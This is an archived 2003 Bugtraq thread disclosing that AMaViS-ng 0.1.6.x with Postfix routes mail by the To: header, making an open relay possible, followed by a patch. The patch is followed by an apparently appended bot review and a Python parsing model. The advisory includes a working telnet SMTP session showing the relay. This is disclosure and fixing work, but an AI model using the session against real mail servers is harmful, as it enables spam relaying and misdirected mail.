98077 2003-04-08 18:38 /62 lines/ Phil Cyc <ajEA3UMBepQ4MRExDmm0qbFeeQEJtffpg.1@protected.unixadm.org>
Imported: 2003-04-08 18:38 by Brevbäraren
External recipient: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <4413>
Subject: AMaViS-ng 0.1.6.x and postfix: possible open relay and mail loss
------------------------------------------------------------
Hi everyone -

with postfix using AMaViS-ng 0.1.6.x (tested: 0.1.6.2 and 0.1.6.3; 0.1.4.x is not vulnerable), all email gets forwarded to the address specified by the "To:" header line, ignoring the real recipient given via "RCPT TO:".

Possible exploit:

--%snip%--
    #> telnet somemx.domain.tld 25
    (220 somemx.domain.tld ESMTP Postfix)
    helo amavis-ng
    (250 somemx.domain.tld)
    mail from:userX@domainX.tld
    (250 ok)
    rcpt to:userY@domain.tld
    (250 ok)
    data
    (354 End data with <CR><LF>.<CR><LF>)
    From: userX@domainX.tld
    To: userZ@domainZ.tld
    Subject: AMaViS-ng 0.1.6.x bug
    .
    (250 Ok: queued as ...)
    quit
    (221 Bye)
--%snip%--

Requirements:
The mx (somemx.domain.tld) having postfix and AMaViS-ng 0.1.6.x installed must accept emails for userY@domain.tld.

What it does:
userX@domainX.tld is sending an email to userY@domain.tld. The header of this email contains "To: userZ@domain.tld". AMaViS-ng seems to parse the header and forwards the email to userZ@domain.tld. userY@domain.tld does not get this email.

As many postfix users trust their localhost (no restrictions for localhost), it is possible to relay an email or a spam mail this way.

Configuration files (relevant parts):

    # $postfix/master.cf
    smtp inet n - n - - smtpd
      -o content_filter=filter:
    filter unix - n n - - pipe
      flags=Rq user=mail argv=/usr/bin/amavis ${sender} -- ${recipient}
    # end of master.cf

    # $amavis-ng/amavis.conf
    [global]
    mail-transfer-agent = Postfix

    [Postfix]
    postfix = /usr/sbin/sendmail
    args = -i -f
    # end of amavis.conf

There is no problem with AMaViS == 0.1.4.x

Kind regards,
Phil Cyc
(98077) /Phil Cyc <ajEA3UMBepQ4MRExDmm0qbFeeQEJtffpg.1@protected.unixadm.org>/(Re-wrapped)

98298 2003-04-10 06:46 /12 lines/ Phil Cyc <ajEA3UMBepQ4MRExDmm0qbFeeQEJtffpg.1@protected.unixadm.org>
Imported: 2003-04-10 06:46 by Brevbäraren
External recipient: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <4437>
Comment on text 98077 by Phil Cyc <ajEA3UMBepQ4MRExDmm0qbFeeQEJtffpg.1@protected.unixadm.org>
Subject: Re: AMaViS-ng 0.1.6.x and postfix: possible open relay and mail loss
------------------------------------------------------------
Hi -

As long as the problem is not fixed by the AMaViS-ng maintainers, this patch could be helpful. I took the relevant part from the version 0.1.4.1 source. This patch (attachment) applies to 0.1.6.3.
Kind regards,
Phil Cyc
(98298) /Phil Cyc <ajEA3UMBepQ4MRExDmm0qbFeeQEJtffpg.1@protected.unixadm.org>/(Re-wrapped)
Attachment (text/x-diff) in text 98299

98299 2003-04-10 06:46 /32 lines/ Phil Cyc <ajEA3UMBepQ4MRExDmm0qbFeeQEJtffpg.1@protected.unixadm.org>
Attachment filename: "postfix.patch"
Imported: 2003-04-10 06:46 by Brevbäraren
External recipient: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <4438>
Attachment (text/plain) to text 98298
Subject: Attachment (postfix.patch) to: Re: AMaViS-ng 0.1.6.x and postfix: possible open relay and mail loss
------------------------------------------------------------
diff -Nru amavis-ng-0.1.6.3.orig/AMAVIS/MTA/Postfix.pm amavis-ng-0.1.6.3.postfix/AMAVIS/MTA/Postfix.pm
--- amavis-ng-0.1.6.3.orig/AMAVIS/MTA/Postfix.pm Tue Mar 18 00:04:21 2003
+++ amavis-ng-0.1.6.3.postfix/AMAVIS/MTA/Postfix.pm Tue Apr 8 23:28:09 2003
@@ -112,22 +112,11 @@
 writelog($args,LOG_DEBUG, "Called as amavis ".join(' ',@ARGV));
- while (shift @ARGV) {
- /^-f$/ && next; # ignore "-f"
- /^-d$/ && next; # ignore "-d"
- s/^(.*)$/$1/; # untaint sender or recipient
- if (not defined $$args{'sender'}) {
- if (/^$/) {
- $$args{'sender'} = "<>";
- }
- else {
- $$args{'sender'} = $_;
- }
- }
- else {
- push @{$$args{'recipients'}}, $_;
- }
- }
+ shift @ARGV if $ARGV[0] eq "-f";
+ $$args{'sender'} = shift @ARGV;
+ $$args{'sender'} = "<>" if (!$$args{'sender'});
+ shift @ARGV if $ARGV[0] eq "-d";
+ push @{$$args{'recipients'}}, @ARGV;
 # Message file has been written, reset file pointer and put it into
 # the record.
(98299) /Phil Cyc <ajEA3UMBepQ4MRExDmm0qbFeeQEJtffpg.1@protected.unixadm.org>/(Re-wrapped)
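Review bot: the replacement lines skip only `-f` and `-d`, but the master.cf posted in the first message calls `argv=/usr/bin/amavis ${sender} -- ${recipient}`, so with this patch the literal `--` is pushed into `@{$$args{'recipients'}}` as if it were a recipient; add `shift @ARGV if $ARGV[0] eq "--";` before the `push`. The comparisons `$ARGV[0] eq "-f"` and `$ARGV[0] eq "-d"` read `$ARGV[0]` even when `@ARGV` is empty, which produces an uninitialized-value warning under `-w`; guard them with `@ARGV and ...`. The removed loop also carried `s/^(.*)$/$1/; # untaint sender or recipient`; if the script runs under taint mode, the sender and recipient strings now reach the sendmail call tainted, so keep an equivalent untaint step for the values taken from `@ARGV`.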
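The envelope-versus-header routing the first message describes, modelled in Python as an added example (not AMaViS-ng's own Perl code): a content filter must take sender and recipients from the argv that Postfix's pipe transport passes (the `${sender} -- ${recipient}` form of the posted master.cf), tolerate the `--` separator, refuse to continue with no envelope recipients, and reinject with the `-i -f` arguments of the posted amavis.conf. The function and exception names are assumptions made for this example.

```python
"""Model of the argv a Postfix pipe(8) content_filter hands to a filter,
and of the parsing the filter must do before reinjecting the message.
Constructed example in Python, not AMaViS-ng's own Perl code."""
import shlex
from typing import List, Tuple


class FilterArgError(ValueError):
    """argv does not carry a usable envelope (sender and recipients)."""


def parse_filter_argv(argv: List[str]) -> Tuple[str, List[str]]:
    """Parse `[-f] sender [-d] [--] recipient...` into (sender, recipients).
    Follows the order the posted patch assumes, with two safeguards:
    the literal `--` from master.cf (`${sender} -- ${recipient}`) is not
    taken as a recipient, and an empty recipient list is rejected, so the
    caller can never fall back to the message's To: header for routing.
    """
    args = list(argv)
    if args and args[0] == "-f":
        args.pop(0)
    if not args:
        raise FilterArgError("no envelope sender on command line")
    sender = args.pop(0) or "<>"          # empty string => null sender
    if args and args[0] == "-d":
        args.pop(0)
    recipients = [r for r in args if r and r != "--"]
    if not recipients:
        raise FilterArgError("no envelope recipients on command line")
    return sender, recipients


def build_reinject_argv(sender: str, recipients: List[str],
                        sendmail: str = "/usr/sbin/sendmail",
                        extra: str = "-i -f") -> List[str]:
    """Build the sendmail command that reinjects the scanned message.
    `extra` mirrors `args = -i -f` in the reporter's amavis.conf. The
    recipients go explicitly after `--`, so delivery follows the SMTP
    envelope (RCPT TO) and a recipient beginning with `-` cannot be
    read as an option.
    """
    cmd = [sendmail] + shlex.split(extra)
    if cmd[-1] == "-f":
        cmd.append(sender)                # `-f` takes the sender as its argument
    return cmd + ["--"] + recipients
```

With the advisory's session, `parse_filter_argv(["userX@domainX.tld", "--", "userY@domain.tld"])` yields the envelope recipient `userY@domain.tld` regardless of what the `To:` header says.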